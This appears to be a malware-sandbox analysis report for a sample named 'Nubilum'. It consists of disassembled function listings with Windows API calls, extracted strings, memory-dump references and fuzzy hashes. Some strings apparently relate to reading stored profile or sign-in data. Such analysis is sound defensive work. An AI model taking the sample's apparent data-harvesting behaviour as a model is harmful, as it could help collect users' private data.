                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: PrivateProfilewcscpy$AttributesFileString
                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                          • API String ID: 3176057301-2039793938
                          • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                          • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                          APIs
                          Strings
                          • cannot ATTACH database within transaction, xrefs: 0042F663
                          • unable to open database: %s, xrefs: 0042F84E
                          • too many attached databases - max %d, xrefs: 0042F64D
                          • database is already attached, xrefs: 0042F721
                          • out of memory, xrefs: 0042F865
                          • database %s is already in use, xrefs: 0042F6C5
                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                          • API String ID: 1297977491-2001300268
                          • Opcode ID: d90276cd3b33e84704fa81d672eb3a60ddd37f71ba5f2179a76d6bf5f10cf06e
                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                          • Opcode Fuzzy Hash: d90276cd3b33e84704fa81d672eb3a60ddd37f71ba5f2179a76d6bf5f10cf06e
                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                          APIs
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                          • memcpy.MSVCRT ref: 0040EB80
                          • memcpy.MSVCRT ref: 0040EB94
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                          • String ID: ($d
                          • API String ID: 1140211610-1915259565
                          • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                          • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                          APIs
                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                          • Sleep.KERNEL32(00000001), ref: 004178E9
                          • GetLastError.KERNEL32 ref: 004178FB
                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$ErrorLastLockSleepUnlock
                          • String ID:
                          • API String ID: 3015003838-0
                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                          APIs
                          • memset.MSVCRT ref: 00407E44
                          • memset.MSVCRT ref: 00407E5B
                          • _mbscpy.MSVCRT ref: 00407E7E
                          • _mbscpy.MSVCRT ref: 00407ED7
                          • _mbscpy.MSVCRT ref: 00407EEE
                          • _mbscpy.MSVCRT ref: 00407F01
                          • wcscpy.MSVCRT ref: 00407F10
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                          • String ID:
                          • API String ID: 59245283-0
                          • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                          • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                          APIs
                          • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                          • GetLastError.KERNEL32 ref: 0041855C
                          • Sleep.KERNEL32(00000064), ref: 00418571
                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                          • GetLastError.KERNEL32 ref: 0041858E
                          • Sleep.KERNEL32(00000064), ref: 004185A3
                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$AttributesDeleteErrorLastSleep$??3@
                          • String ID:
                          • API String ID: 3467550082-0
                          • Opcode ID: 09b49c58799734cfd5cd4ac30739c3777d201f49183e4126d4f53e2d18a03a45
                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                          • Opcode Fuzzy Hash: 09b49c58799734cfd5cd4ac30739c3777d201f49183e4126d4f53e2d18a03a45
                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                          • API String ID: 3510742995-3273207271
                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                          • memset.MSVCRT ref: 00413ADC
                          • memset.MSVCRT ref: 00413AEC
                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                          • memset.MSVCRT ref: 00413BD7
                          • wcscpy.MSVCRT ref: 00413BF8
                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                          • String ID: 3A
                          • API String ID: 3300951397-293699754
                          • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                          • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                          • wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                          • wcslen.MSVCRT ref: 0040D1D3
                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                          • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                          • memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                          • String ID: strings
                          • API String ID: 3166385802-3030018805
                          • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                          • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                          APIs
                          • memset.MSVCRT ref: 00411AF6
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                          • wcsrchr.MSVCRT ref: 00411B14
                          • wcscat.MSVCRT ref: 00411B2E
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FileModuleNamememsetwcscatwcsrchr
                          • String ID: AE$.cfg$General$EA
                          • API String ID: 776488737-1622828088
                          • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                          • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                          APIs
                          • memset.MSVCRT ref: 0040D8BD
                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                          • memset.MSVCRT ref: 0040D906
                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                          • _wcsicmp.MSVCRT ref: 0040D92F
                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                          • String ID: sysdatetimepick32
                          • API String ID: 1028950076-4169760276
                          • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                          • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: -journal$-wal
                          • API String ID: 438689982-2894717839
                          • Opcode ID: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                          • Opcode Fuzzy Hash: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                          • EndDialog.USER32(?,00000002), ref: 00405C83
                          • EndDialog.USER32(?,00000001), ref: 00405C98
                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Item$Dialog$MessageSend
                          • String ID:
                          • API String ID: 3975816621-0
                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                          APIs
                          • _wcsicmp.MSVCRT ref: 00444D09
                          • _wcsicmp.MSVCRT ref: 00444D1E
                          • _wcsicmp.MSVCRT ref: 00444D33
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _wcsicmp$wcslen$_memicmp
                          • String ID: .save$http://$https://$log profile$signIn
                          • API String ID: 1214746602-2708368587
                          • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                          • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                          • String ID:
                          • API String ID: 2313361498-0
                          • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                          • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                          APIs
                          • GetClientRect.USER32(?,?), ref: 00405F65
                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                          • GetWindow.USER32(00000000), ref: 00405F80
                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Window$ItemMessageRectSend$Client
                          • String ID:
                          • API String ID: 2047574939-0
                          • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                          • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                          • String ID:
                          • API String ID: 4218492932-0
                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                          APIs
                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                          • memcpy.MSVCRT ref: 0044A8BF
                          • memcpy.MSVCRT ref: 0044A90C
                          • memcpy.MSVCRT ref: 0044A988
                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                          • memcpy.MSVCRT ref: 0044A9D8
                          • memcpy.MSVCRT ref: 0044AA19
                          • memcpy.MSVCRT ref: 0044AA4A
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: gj
                          • API String ID: 438689982-4203073231
                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                          APIs
                          Strings
                          Memory Dump Source
